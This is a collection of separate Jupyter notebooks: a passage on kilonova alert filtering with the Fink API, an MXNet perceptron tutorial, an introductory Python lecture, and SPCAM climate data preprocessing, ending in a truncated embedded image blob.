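The absolute-magnitude cut relies on the standard distance modulus, $M = m - 5\log_{10}(d_L/10\,\mathrm{pc})$, with the host galaxy's luminosity distance standing in for the unknown distance of the alert. A sketch of that computation with toy values (the real filter then applies the ±1 mag tolerance around −16):

```
import numpy as np

# Distance-modulus sketch (toy values, not notebook data): absolute magnitude
# of an alert, assuming it lies in a host galaxy at luminosity distance d_mpc.
def absolute_magnitude(apparent_mag, d_mpc):
    d_pc = d_mpc * 1e6                      # Mpc -> pc
    return apparent_mag - 5 * np.log10(d_pc / 10.0)

m = 19.0       # assumed apparent magnitude of the alert
d_mpc = 100.0  # assumed luminosity distance of the associated galaxy
M = absolute_magnitude(m, d_mpc)
print(round(M, 2))  # -16.0
print(abs(M - (-16.0)) <= 1.0)  # True: compatible with the kilonova cut
```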
[1] J-G Ducoin et al. "Optimizing gravitational waves follow-up using galaxies stellar mass". In: Monthly Notices of the Royal Astronomical Society 492.4 (Jan. 2020), pp. 4768–4779. issn: 1365-2966. doi: 10.1093/mnras/staa114. url: http://dx.doi.org/10.1093/mnras/staa114.
[2] Mansi M. Kasliwal et al. "Kilonova Luminosity Function Constraints Based on Zwicky Transient Facility Searches for 13 Neutron Star Merger Triggers during O3". In: The Astrophysical Journal 905.2 (Dec. 2020), p. 145. issn: 1538-4357. doi: 10.3847/1538-4357/abc335. url: http://dx.doi.org/10.3847/1538-4357/abc335.
```
import os
import requests
import pandas as pd
import numpy as np
from astropy.coordinates import SkyCoord
from astropy import units as u
# pip install fink_filters
from fink_filters import __file__ as fink_filters_location
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_context('talk')
APIURL = 'https://fink-portal.org'
```
## KN-Mangrove data
Let's load the alert data from this filter:
```
pdf_kn_ma = pd.read_parquet('data/0104_3009_kn_filter2_class.parquet')
nalerts_kn_ma = len(pdf_kn_ma)
nunique_alerts_kn_ma = len(np.unique(pdf_kn_ma['objectId']))
print(
'{} alerts loaded ({} unique objects)'.format(
nalerts_kn_ma,
nunique_alerts_kn_ma
)
)
```
## Visualising the candidates
Finally, let's inspect one lightcurve:
```
oid = pdf_kn_ma['objectId'].values[2]
tns_class = pdf_kn_ma['TNS'].values[2]
kn_trigger = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[2]
r = requests.post(
'{}/api/v1/objects'.format(APIURL),
json={
'objectId': oid,
'withupperlim': 'True'
}
)
# Format output in a DataFrame
pdf = pd.read_json(r.content)
fig = plt.figure(figsize=(15, 6))
colordic = {1: 'C0', 2: 'C1'}
for filt in np.unique(pdf['i:fid']):
maskFilt = pdf['i:fid'] == filt
# The column `d:tag` is used to check data type
maskValid = pdf['d:tag'] == 'valid'
plt.errorbar(
pdf[maskValid & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),
pdf[maskValid & maskFilt]['i:magpsf'],
pdf[maskValid & maskFilt]['i:sigmapsf'],
ls = '', marker='o', color=colordic[filt]
)
maskUpper = pdf['d:tag'] == 'upperlim'
plt.plot(
pdf[maskUpper & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),
pdf[maskUpper & maskFilt]['i:diffmaglim'],
ls='', marker='^', color=colordic[filt], markerfacecolor='none'
)
maskBadquality = pdf['d:tag'] == 'badquality'
plt.errorbar(
pdf[maskBadquality & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),
pdf[maskBadquality & maskFilt]['i:magpsf'],
pdf[maskBadquality & maskFilt]['i:sigmapsf'],
ls='', marker='v', color=colordic[filt]
)
plt.axvline(kn_trigger - 2400000.5, ls='--', color='grey')
plt.gca().invert_yaxis()
plt.xlabel('Modified Julian Date')
plt.ylabel('Magnitude')
plt.title('{}'.format(oid))
plt.show()
print('{}/{}'.format(APIURL, oid))
```
Circles (●) with error bars show valid alerts that pass the Fink quality cuts. Upper triangles (▲) with error bars represent alert measurements that do not satisfy the Fink quality cuts, but are nevertheless contained in the history of valid alerts and used by classifiers. Lower triangles (▽) represent the 5-sigma magnitude limit in the difference image, based on PSF-fit photometry, contained in the history of valid alerts. The vertical line shows the KN trigger by Fink.
## Evolution of the classification
Each alert was triggered because the Fink pipelines favoured the KN flavour at the time of emission. But the underlying object on the sky might have generated further alerts afterwards, and the classification could evolve. For a handful of alerts, let's see what they became. For this, we will use the Fink REST API and query all the data for the underlying object:
```
NALERTS = 3
oids = pdf_kn_ma['objectId'].values[0: NALERTS]
kn_triggers = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[0: NALERTS]
for oid, kn_trigger in zip(oids, kn_triggers):
r = requests.post(
'{}/api/v1/objects'.format(APIURL),
json={
'objectId': oid,
'output-format': 'json'
}
)
# Format output in a DataFrame
pdf_ = pd.read_json(r.content)
times, classes = np.transpose(pdf_[['i:jd','v:classification']].values)
fig = plt.figure(figsize=(12, 5))
plt.plot(times, classes, ls='', marker='o')
plt.axvline(kn_trigger, ls='--', color='C1')
plt.title(oid)
plt.xlabel('Time (Julian Date)')
plt.ylabel('Fink inferred classification')
plt.show()
oids
```
Note that the Kilonova classification does not appear here, as this label is reserved for the KN-LC filter. We are working on adding a dedicated label.
One can see that the alert classification for a given object can change over time. As time passes, we collect more data and get a clearer view of the nature of the object. Let's make a histogram of the final classification for each object (~1 min to run):
```
final_classes = []
oids = np.unique(pdf_kn_ma['objectId'].values)
for oid in oids:
r = requests.post(
'{}/api/v1/objects'.format(APIURL),
json={
'objectId': oid,
'output-format': 'json'
}
)
pdf_ = pd.read_json(r.content)
if not pdf_.empty:
final_classes.append(pdf_['v:classification'].values[0])
fig = plt.figure(figsize=(12, 5))
plt.hist(final_classes)
plt.xticks(rotation=15.)
plt.title('Final Fink classification of KN candidates');
```
Most of the objects are still unknown according to Fink.
## Follow-up of candidates by other instruments
Some of the alerts benefited from follow-up by other instruments to determine their nature. Usually this information can be found on the TNS server (although this is highly biased towards Supernovae). We attached this information to the alerts (if it exists):
```
pdf_kn_ma.groupby('TNS').count().sort_values('objectId', ascending=False)['objectId']
```
We can see that among all 53 alerts forwarded by Fink, 39 have no known counterpart in TNS (i.e. no follow-up result was reported).
## Retrieving Mangrove data
```
catalog_path = os.path.join(os.path.dirname(fink_filters_location), 'data/mangrove_filtered.csv')
pdf_mangrove = pd.read_csv(catalog_path)
pdf_mangrove.head(2)
# ZTF
ra1 = pdf_kn_ma['candidate'].apply(lambda x: x['ra'])
dec1 = pdf_kn_ma['candidate'].apply(lambda x: x['dec'])
# Mangrove
cols = ['internal_names', 'ra', 'declination', 'discoverydate', 'type']
ra2, dec2, name, lum_dist, ang_dist = pdf_mangrove['ra'], pdf_mangrove['dec'], pdf_mangrove['2MASS_name'], pdf_mangrove['lum_dist'], pdf_mangrove['ang_dist']
# create catalogs
catalog_ztf = SkyCoord(ra=ra1.values*u.degree, dec=dec1.values*u.degree)
catalog_mangrove = SkyCoord(ra=np.array(ra2, dtype=float)*u.degree, dec=np.array(dec2, dtype=float)*u.degree)
# cross-match
idx, d2d, d3d = catalog_ztf.match_to_catalog_sky(catalog_mangrove)
pdf_kn_ma['2MASS_name'] = name.values[idx]
pdf_kn_ma['separation (Kpc)'] = d2d.radian * ang_dist.values[idx] * 1000
pdf_kn_ma['lum_dist (Mpc)'] = lum_dist.values[idx]
pdf_kn_ma[['objectId', '2MASS_name', 'separation (Kpc)', 'lum_dist (Mpc)']].head(5)
fig = plt.figure(figsize=(12, 6))
plt.hist(pdf_kn_ma['lum_dist (Mpc)'], bins=20)
plt.xlabel('Luminosity distance of matching galaxies (Mpc)');
np.max(pdf_kn_ma['lum_dist (Mpc)'])
```
|
github_jupyter
|
# The Perceptron
```
import mxnet as mx
from mxnet import nd, autograd
import matplotlib.pyplot as plt
import numpy as np
mx.random.seed(1)
```
## A Separable Classification Problem
```
# generate fake data that is linearly separable with a margin epsilon given the data
def getfake(samples, dimensions, epsilon):
wfake = nd.random_normal(shape=(dimensions)) # fake weight vector for separation
bfake = nd.random_normal(shape=(1)) # fake bias
wfake = wfake / nd.norm(wfake) # rescale to unit length
# making some linearly separable data, simply by choosing the labels accordingly
X = nd.zeros(shape=(samples, dimensions))
Y = nd.zeros(shape=(samples))
i = 0
while (i < samples):
tmp = nd.random_normal(shape=(1,dimensions))
margin = nd.dot(tmp, wfake) + bfake
if (nd.norm(tmp).asscalar() < 3) & (abs(margin.asscalar()) > epsilon):
X[i,:] = tmp[0]
Y[i] = 1 if margin.asscalar() > 0 else -1
i += 1
return X, Y
# plot the data with colors chosen according to the labels
def plotdata(X,Y):
for (x,y) in zip(X,Y):
if (y.asscalar() == 1):
plt.scatter(x[0].asscalar(), x[1].asscalar(), color='r')
else:
plt.scatter(x[0].asscalar(), x[1].asscalar(), color='b')
# plot contour plots on a [-3,3] x [-3,3] grid
def plotscore(w,d):
xgrid = np.arange(-3, 3, 0.02)
ygrid = np.arange(-3, 3, 0.02)
xx, yy = np.meshgrid(xgrid, ygrid)
zz = nd.zeros(shape=(xgrid.size, ygrid.size, 2))
zz[:,:,0] = nd.array(xx)
zz[:,:,1] = nd.array(yy)
vv = nd.dot(zz,w) + d
CS = plt.contour(xgrid,ygrid,vv.asnumpy())
plt.clabel(CS, inline=1, fontsize=10)
X, Y = getfake(50, 2, 0.3)
plotdata(X,Y)
plt.show()
```
## Perceptron Implementation
```
def perceptron(w,b,x,y):
if (y * (nd.dot(w,x) + b)).asscalar() <= 0:
w += y * x
b += y
return 1
else:
return 0
w = nd.zeros(shape=(2))
b = nd.zeros(shape=(1))
for (x,y) in zip(X,Y):
res = perceptron(w,b,x,y)
if (res == 1):
print('Encountered an error and updated parameters')
print('data {}, label {}'.format(x.asnumpy(),y.asscalar()))
print('weight {}, bias {}'.format(w.asnumpy(),b.asscalar()))
plotscore(w,b)
plotdata(X,Y)
plt.scatter(x[0].asscalar(), x[1].asscalar(), color='g')
plt.show()
```
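The same mistake-driven update can be checked in plain NumPy on a tiny hand-made separable dataset (an illustration, independent of the MXNet code above):

```
import numpy as np

# Plain-NumPy perceptron sketch (toy data): on a mistake, w += y*x and b += y,
# exactly the update rule used by the MXNet implementation.
X = np.array([[2.0, 1.0], [-1.0, -2.0], [1.5, 0.5], [-2.0, -0.5]])
Y = np.array([1, -1, 1, -1])

w = np.zeros(2)
b = 0.0
updates = 0
for _ in range(10):                # a few passes over the (separable) data
    errors = 0
    for x, y in zip(X, Y):
        if y * (w @ x + b) <= 0:   # mistake, or exactly on the boundary
            w += y * x
            b += y
            errors += 1
            updates += 1
    if errors == 0:                # no mistakes left: the data is separated
        break

assert all(y * (w @ x + b) > 0 for x, y in zip(X, Y))
print(w, b, updates)
```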
## Perceptron Convergence in Action
```
Eps = np.arange(0.025, 0.45, 0.025)
Err = np.zeros(shape=(Eps.size))
for j in range(10):
for (i,epsilon) in enumerate(Eps):
w = nd.zeros(shape=(2)) # reset the parameters for each trial
b = nd.zeros(shape=(1))
X, Y = getfake(1000, 2, epsilon)
for (x,y) in zip(X,Y):
Err[i] += perceptron(w,b,x,y)
Err = Err / 10.0
plt.plot(Eps, Err, label='average number of updates for training')
plt.legend()
plt.show()
```
|
github_jupyter
|
# Lecture 2: Introducing Python
CSCI 1360E: Foundations for Informatics and Analytics
## Overview and Objectives
In this lecture, I'll introduce the Python programming language and how to interact with it; aka, the proverbial [Hello, World!](https://en.wikipedia.org/wiki/%22Hello,_World!%22_program) lecture. By the end, you should be able to:
- Recall basic history and facts about Python (relevance in scientific computing, comparison to other languages)
- Print arbitrary strings in a Python environment
- Create and execute basic arithmetic operations
- Understand and be able to use variable assignment and update
## Part 1: Background
Python as a language was implemented from the start by Guido van Rossum. What was originally something of a [snarkily-named hobby project to pass the holidays](https://www.python.org/doc/essays/foreword/) turned into a huge open source phenomenon used by millions.

### Python's history
The original project began in 1989.
- Release of Python 2.0 in 2000
- Release of Python 3.0 in 2008
- The latest stable releases of these branches are **2.7.12**--which Guido *emphatically* insists is the final, final, final release of the 2.x branch--and **3.5.3** (which is what we're using in this course)
Wondering why a 2.x branch has survived a *decade and a half* after its initial release?
Python 3 was designed as backwards-incompatible; a good number of syntax changes and other internal improvements made the majority of code written for Python 2 unusable in Python 3.
This made it difficult for power users and developers to upgrade, particularly when they relied on so many third-party libraries for much of the heavy-lifting in Python.
Until these third-party libraries were themselves converted to Python 3 (really only in the past couple years!), most developers stuck with Python 2.
### Python, the Language
Python is an **interpreted** language.
Contrast with **compiled** languages like C, C++, and Java.
In practice, the distinction between **interpreted** and **compiled** has become blurry, particularly in the past decade.
- Interpreted languages *in general* are easier to use but run more slowly and consume more resources
- Compiled languages *in general* have a higher learning curve for programming, but run much more efficiently
As a consequence of these advantages and disadvantages, modern programming languages have attempted to combine the best of both worlds:
- Java is initially compiled into bytecode, which is then run through the Java Virtual Machine (JVM) which acts as an interpreter. In this sense, it is both a compiled language and an interpreted language.
- Python runs on a reference implementation, CPython, in which chunks of Python code are compiled into intermediate representations and executed.
- [Julia](http://julialang.org/), a relative newcomer in programming languages designed for scientific computing and data science, straddles a middle ground in a different way: using a "just-in-time" (JIT) compilation scheme, whereby code is compiled *as the program runs*, theoretically providing the performance of compiled programs with the ease of use of interpreted programs. JIT compilers have proliferated for other languages as well, including Python (but these are well beyond the scope of this course; take CSCI 4360 if interested!)
Python is a very **general** language.
- Not designed as a specialized language for performing a specific task. Instead, it relies on third-party developers to provide these extras.

Instead, as [Jake VanderPlas](http://jakevdp.github.io/) put it:
> "Python syntax is the glue that holds your data science code together. As many scientists and statisticians have found, Python excels in that role because it is powerful, intuitive, quick to write, fun to use, and above all extremely useful in day-to-day data science tasks."
### Zen of Python
One of the biggest reasons for Python's popularity is its overall simplicity and ease of use.
Python was designed *explicitly* with this in mind!
It's so central to the Python ethos, in fact, that it's baked into every Python installation. Tim Peters wrote a "poem" of sorts, *The Zen of Python*, that anyone with Python installed can read.
To see it, just type one line of Python code (yes, this is *live Python code*):
```
import this
```
Lack of any discernible meter or rhyming scheme aside, it nonetheless encapsulates the spirit of the Python language. These two lines are particular favorites of mine:
> If the implementation is hard to explain, it's a bad idea.
> If the implementation is easy to explain, it may be a good idea.
Line 1:
- If you wrote the code and can't explain it\*, go back and fix it.
- If you didn't write the code and can't explain it, get the person who wrote it to fix it.
Line 2:
- "Easy to explain": necessary and sufficient for good code?
Don't you just feel so zen right now?
\* Lone exception to this rule: **code golf**


The goal of *code golf* is to write a program that achieves a certain objective **using as few characters as possible**.
The result is the complete gibberish you see in this screenshot. Fun for competitive purposes; insanely *not*-useful for real-world problems.
## Part 2: Hello, World!
Enough reading, time for some coding, amirite?
```
print("Hello, world!")
```
Yep! That's all there is to it.
Just for the sake of being thorough, though, let's go through this command in painstaking detail.
**Functions**: `print()` is a function.
- Functions take input, perform an operation on it, and give back (return) output.
You can think of it as a direct analog of the mathematical term, $f(x) = y$. In this case, $f()$ is the function; $x$ is the input, and $y$ is the output.
Later in the course, we'll see how to create our own functions, but for now we'll make use of the ones Python provides us by default.
**Arguments**: the input to the function.
- Interchangeable with "parameters".
In this case, there is only one argument to `print()`: a string of text that we want printed out. This text, in Python parlance, is called a "string". I can only presume it is so named because it is a *string* of individual characters.
We can very easily change the argument we pass to `print()`:
```
print("This is not the same argument as before.")
```
We could also print out an empty string, or even no string at all.
```
print("") # this is an empty string
print() # this is just nothing
```
In both cases, the output looks pretty much the same...because it is: just a blank line.
- After `print()` finishes printing your input, it prints one final character--a *newline*.
This is basically the programmatic equivalent of hitting `Enter` at the end of a line, moving the cursor down to the start of the next line.
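You can see (and override) that trailing newline for yourself: `print()` takes an optional `end` parameter that replaces the final character.

```python
# print() appends "\n" by default; end= overrides that final character
print("Hello,", end=" ")   # stays on the same line
print("world!")            # together these print: Hello, world!
```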
### What are "strings"?
Briefly--the data type Python uses for text: a *sequence of characters*, which can include letters, digits, punctuation, even spaces.
Look for the quotes--double `"` or single `'`!
```
"5" # This is a string.
5 # This is NOT a string.
```
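If you're ever unsure which kind of data you're dealing with, the built-in `type()` function will tell you:

```python
print(type("5"))   # <class 'str'>  -- a string
print(type(5))     # <class 'int'>  -- an integer
```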
### What are the hashtags? (`#`)
Delineators for *comments*.
- Comments are lines in your program that the language ignores entirely.
- When you type a `#` in Python, everything *after* that symbol on the same line is ignored by Python.
They're there purely for the developers as a way to put documentation and clarifying statements directly into the code. It's a practice I **strongly** encourage everyone to adopt--even just to remind yourself what you were thinking! I can't count the number of times I've worked on code, set it aside for a month, then come back to it and had absolutely no idea what I was doing.
## Part 3: Beyond "Hello, World!"
Ok, so Python can print strings. That's cool. Can it do anything that's actually useful?
Python has a lot of built-in objects and data structures that are very useful for more advanced operations--and we'll get to them soon enough!--but for now, you can use Python to perform basic arithmetic operations.
Addition, subtraction, multiplication, division--they're all there. You can use it as a glorified calculator:
```
3 + 4
3 - 4
3 * 4
3 / 4
```
Python respects order of operations, too, performing them as you'd expect:
```
3 + 4 * 6 / 2 - 5
(3 + 4) * 6 / (2 - 5)
```
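Working those two expressions out by hand confirms the rules: multiplication and division bind tighter than addition and subtraction, and parentheses override everything.

```python
# 4 * 6 = 24, then 24 / 2 = 12.0, then 3 + 12.0 - 5 = 10.0
print(3 + 4 * 6 / 2 - 5)       # 10.0
# parentheses first: (3 + 4) = 7 and (2 - 5) = -3, so 7 * 6 / -3 = -14.0
print((3 + 4) * 6 / (2 - 5))   # -14.0
```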
Python even has a really cool exponent operator, denoted by using two stars right next to each other:
```
2 ** 3 # 2 raised to the 3rd power
3 ** 2 # 3 squared
25 ** (1 / 2) # Square root of 25
```
Now for something really neat:
```
x = 2
x * 3
```
This is an example of using Python *variables*.
- Variables store and maintain values that can be updated and manipulated as the program runs.
- You can name a variable whatever you like, as long as it doesn't start with a number ("`5var`" would be illegal, but "`var5`" would be fine) or collide with one of Python's reserved keywords (like `for` or `if`). Reusing a built-in name such as `print` is technically legal, but it shadows the original and should be avoided.
Here's an operation that involves two variables:
```
x = 2
y = 3
x * y
```
We can assign the result of operations with variables to other variables:
```
x = 2
y = 3
z = x * y
print(z)
```
The use of the equals sign `=` is called the *assignment operator*.
- "Assignment" takes whatever value is being computed on the right-hand side of the equation and *assigns* it to the variable on the left-hand side.
- Multiplication (`*`), Division (`/`), Addition (`+`), and Subtraction (`-`) are also *operators*.
What happens if I perform an assignment on something that can't be assigned a different value...such as, say, a number?
```
x = 2
y = 3
5 = x * y
```
**CRASH!**
Ok, not really; Python technically did what it was supposed to do. It threw an error, alerting you that something in your program didn't work for some reason. In this case, the error message is `can't assign to literal`.
Parsing out the `SyntaxError` message:
- `Error` is an obvious hint. `Syntax` gives us some context.
- We did something wrong that involves Python's syntax, or the structure of its language.
The "`literal`" being referred to is the number 5 in the statement: `5 = x * y`
- We are attempting to assign the result of the computation of `x * y` to the number 5
- However, 5 is known internally to Python as a "literal"
- 5 is literally 5; you can't change the value of 5! (5 = 8? NOPE)
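If you want to poke at this error without crashing your session, you can hand the offending statement to the built-in `compile()` function, which raises the same `SyntaxError` at parse time:

```python
# compile() parses source text, so assigning to a literal fails immediately
try:
    compile("5 = x * y", "<demo>", "exec")
except SyntaxError as err:
    print(type(err).__name__)   # SyntaxError
```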
So we can't assign values to numbers. What about assigning values to a variable that's used in the very same calculation?
```
x = 2
y = 3
x = x * y
print(x)
```
This works just fine! In fact, it's more than fine--this is such a standard operation, it has its own operator:
```
x = 2
y = 3
x *= y
print(x)
```
Out loud, it's pretty much what it sounds like: "x times equals y".
This is an instance of a shorthand operator.
- We multiplied `x` by `y` and stored the product in `x`, effectively updating it.
- There are many instances where you'll want to increment a variable: for example, when counting how many of some "thing" you have.
- All the other operators have the same shorthand-update versions: `+=` for addition, `-=` for subtraction, and `/=` for division.
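Here are all four shorthand operators in action on a single counter:

```python
count = 10
count += 1    # 11
count -= 3    # 8
count *= 2    # 16
count /= 4    # 4.0 -- division always produces a float in Python 3
print(count)
```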
## Review Questions
1: Let's say you want to count the number of words in Wikipedia. You have a variable to track this count: `word_count = 0`. For every word you come across, you'll update this counter by 1. Using the shorthand you saw before, what would the command be to update the variable at each word?
2: What would happen if I ran this command? Explain. `("5" + 5)`
3: In this lecture, we used what is essentially a Python shell in order to execute Python commands. Let's say, instead, we wanted to run a sequence of commands in a script. I've put a couple commands in the file `commands.py`. How would you execute this script from the command prompt?
4: What would happen if I ran this command? Explain. `x = y`
## Course Administrivia
- If you haven't done so yet, please **let me know to what email address you'd like me to send a Slack invite.** If I haven't heard from you by Thursday morning, I'll use your UGA address.
- Please check out the revamped [course website](https://eds-uga.github.io/csci1360e-su17/) if you have questions; it should have pretty much all the information you need about the course!
- Assignment 0 comes out tomorrow! It doesn't have a deadline, but is instead an introduction to using JupyterHub. Please go through it, as we'll be using JupyterHub all semester for both homeworks AND exams!
## Additional Resources
1. Guido's PyCon 2016 talk on the future of Python: https://www.youtube.com/watch?v=YgtL4S7Hrwo
2. VanderPlas, Jake. *Python Data Science Handbook*. 2016 (pre-release).
|
github_jupyter
|
```
import numpy as np
import itertools
import math
import scipy
from scipy import spatial
import matplotlib.pyplot as plt
import matplotlib
import matplotlib.patches as patches
from matplotlib import animation
from matplotlib import transforms
from mpl_toolkits.axes_grid1 import make_axes_locatable
import xarray as xr
import dask
from sklearn.cluster import KMeans
from sklearn.cluster import AgglomerativeClustering
import pandas as pd
import netCDF4
def plot_generator_paper(sample, X, Z):
fz = 15*1.25
lw = 4
siz = 100
XNNA = 1.25 # Abscissa where architecture-constrained network will be placed
XTEXT = 0.25 # Text placement
YTEXT = 0.3 # Text placement
plt.rc('text', usetex=False)
matplotlib.rcParams['mathtext.fontset'] = 'stix'
matplotlib.rcParams['font.family'] = 'STIXGeneral'
#mpl.rcParams["font.serif"] = "STIX"
plt.rc('font', family='serif', size=fz)
matplotlib.rcParams['lines.linewidth'] = lw
cmap="RdBu_r"
fig, ax = plt.subplots(1,1, figsize=(15,6))
cs0 = ax.pcolor(X, Z, sample, cmap=cmap, vmin=-1.0, vmax = 1.0)
ax.set_title("Anomalous Vertical Velocity Field Detected By ELBO")
ax.set_ylim(ax.get_ylim()[::-1])
ax.set_xlabel("CRMs", fontsize=fz*1.5)
ax.xaxis.set_label_coords(0.54,-0.05)
h = ax.set_ylabel("hPa", fontsize = fz*1.5)
h.set_rotation(0)
ax.yaxis.set_label_coords(-0.10,0.44)
#y_ticks = np.arange(1350, 0, -350)
#ax.set_yticklabels(y_ticks, fontsize=fz*1.33)
ax.tick_params(axis='x', labelsize=fz*1.33)
ax.tick_params(axis='y', labelsize=fz*1.33)
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar = fig.colorbar(cs0, cax=cax)
cbar.set_label(label=r'$\left(\mathrm{m\ s^{-1}}\right)$', rotation="horizontal", fontsize=fz*1.5, labelpad=30, y = 0.65)
plt.show()
#plt.savefig("/fast/gmooers/gmooers_git/CBRAIN-CAM/MAPS/CI_Figure_Data/Anomaly.pdf")
#plot_generator(test[0,:,:])
path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-20-00000.nc'
extra_variables = xr.open_dataset(path_to_file)
lats = np.squeeze(extra_variables.LAT_20s_to_20n.values)
lons = np.squeeze(extra_variables.LON_0e_to_360e.values)
path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.20*'
extra_variables = xr.open_mfdataset(path_to_file)
amazon = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,-29])
atlantic = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,121])
print(amazon.shape)
others = netCDF4.Dataset("/fast/gmooers/Raw_Data/extras/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-01-00000.nc")
levs = np.array(others.variables['lev'])
new = np.flip(levs)
crms = np.arange(1,129,1)
Xs, Zs = np.meshgrid(crms, new)
Max_Scalar = np.load("/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Max_Scalar.npy")
Min_Scalar = np.load("/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Min_Scalar.npy")
day_images = amazon[16:112,:,:]
week_images = amazon[16:112*6+16,:,:]
synoptic_images = amazon[16:112*13,:,:]
atlantic_day_images = atlantic[5:101,:,:]
atlantic_week_images = atlantic[5:96*7+5,:,:]
atlantic_synoptic_images = atlantic[5:96*14+5,:,:]
Test_Day = np.interp(day_images, (Min_Scalar, Max_Scalar), (0, 1))
Test_Week = np.interp(week_images, (Min_Scalar, Max_Scalar), (0, 1))
Test_Synoptic = np.interp(synoptic_images, (Min_Scalar, Max_Scalar), (0, 1))
atlantic_Test_Day = np.interp(atlantic_day_images, (Min_Scalar, Max_Scalar), (0, 1))
atlantic_Test_Week = np.interp(atlantic_week_images, (Min_Scalar, Max_Scalar), (0, 1))
atlantic_Test_Synoptic = np.interp(atlantic_synoptic_images, (Min_Scalar, Max_Scalar), (0, 1))
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_day.npy",Test_Day)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_week.npy",Test_Week)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_synoptic.npy",Test_Synoptic)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_day.npy",atlantic_Test_Day)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_week.npy",atlantic_Test_Week)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_synoptic.npy",atlantic_Test_Synoptic)
All_amazon = np.interp(amazon[16:,:,:], (Min_Scalar, Max_Scalar), (0, 1))
All_Atlantic = np.interp(atlantic[5:,:,:], (Min_Scalar, Max_Scalar), (0, 1))
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_amazon_all.npy",All_amazon)
np.save("/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_atlantic_all.npy",All_Atlantic)
```
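A note on the normalization used above: `np.interp(data, (lo, hi), (0, 1))` is just a min-max scaling onto [0, 1] (values outside `(lo, hi)` are clipped to the endpoints). A minimal sketch with made-up numbers:

```python
import numpy as np

# min-max scaling via np.interp: lo maps to 0, hi maps to 1, linear in between
data = np.array([-5.0, 0.0, 5.0, 10.0])
lo, hi = data.min(), data.max()
scaled = np.interp(data, (lo, hi), (0, 1))
print(scaled)   # values land at 0, 1/3, 2/3 and 1
```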
|
github_jupyter
|
<a href="https://colab.research.google.com/github/JaccoVeldscholten/SmartDispenser/blob/main/BAVA_Temp_Predictions.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
<div>
/Wqx/Jrbj+bsVFA4n9diUORKQgngyR+rqqrvVxJ0BI7BYu28BKYYyymldNodMJT+I92H3H4w56Xc3STo68iShBLAs4uqqv663m6+uF8JODCLhfNSfouxlBFKp90ByUK/ceHJJbPxgVQ2vJ2feRJZklAC2HcV7ldSBg8YTWBkMizYGGy1WH6pqurBE0ym3QGp9BvplLtjCAml87sVcyJHEkoA7b6XwbOoAcbQh0yD98BYdn+n0+6AVPqNdMrdkWS93fziftfJkNgjOxJKAN3qUwX/WG83H+0cAQYSGJmGuvyWBRtjCNilU/YOiOZU92A2PJDKnHg6vAuyI6EEEOfWaSUglcDI5OjDGSyUvbv3BJNpd0As/UW6O+XuGEBbm46r9Xbzc+kPgbxIKAHEc1oJSGXH2bSoU85YTimlE7QCYt14UsmcTiKJcneTZK5EViSUANI5rQT0ComLW09qcvTdjCFwl07ZO6CXIPdgxiVS2fA2PW9LfwDkRUIJYBinlYA+AqjTZBHNYKGskLJ36fSHQB/jc7q63N1vuf1ozk5bm57LkFSHLEgoAYxTnz74YvAHGgigTtO1OuWM9N4DTKY/BProJ9I5nUQS97tOmkQf2ZBQAhivLs3wr/V2886zBCrl7nIgaMUYAnjplL0DWil3N5jxiFTG4unybsiGhBLA4fx5vd18UgIPsCCYPDsAGSyUF7rzBJPpF4E2xuV0vyp3xwDG4ulS9o5sSCgBHNa1EniAwMjkXSl7x0h2hacTxALa6B/SGYdIotxdFt6W/gDIg4QSwOHV5Rrqk0oCylCgkKi49u4nz4KNMepA3qMnmOTChhvgR8rdDfK4WiwllEglcTt93hFZkFACOI5658/f19uNi7uhPBYCefCeGCyUGRLMS2ezDfCjG08kmfGHJKEsv7nv9LlzkixIKAEc1x/X281H9ypBUQRM86BOOWMJ6KUTJAF+ZN6UzvhDKuXu8mGuxORJKAEc320ogSepBDMXyt1dec/ZEMRisFBuSNm7NBK5wO/MmwZR7o4hJCny8UrsiKmTUAI4jauQVBJEgXmzWMuLhBJjCeql0+6A78yb0hl3SBKSE7eeWjYu9I1MnYQSwOlIKsH8CZTmRZ1yxvrgCSbT5oDvzJvSuaOXVMbd/HhnTJqEEsBpXUgqwTyFdq1sS34s2BhstVh+qqrqwRNMouwdoNzdMA+rxfJLjj+cszLXzc+tsndMmYQSwOlJKsE82WWbJ4tsxlJ+KJ3+EjD+pjPekES5u6zpI5ksCSWA85BUgvkx6c9TXfZOcJsxlL1Lp78E9APpjDekMsfN19vSHwDTJaEEcD6SSjAToR1fep/ZEtRisFB+SNm7NMreQcHCqYlr30AS5e4YQkIpX1ehNChMjoQSwHlJKsE8WKzlTZ1yxnJJejr9JpTLRo50yt2RxD1ls6CvZJIklADOT1IJ8meynz/vkDEE+tJ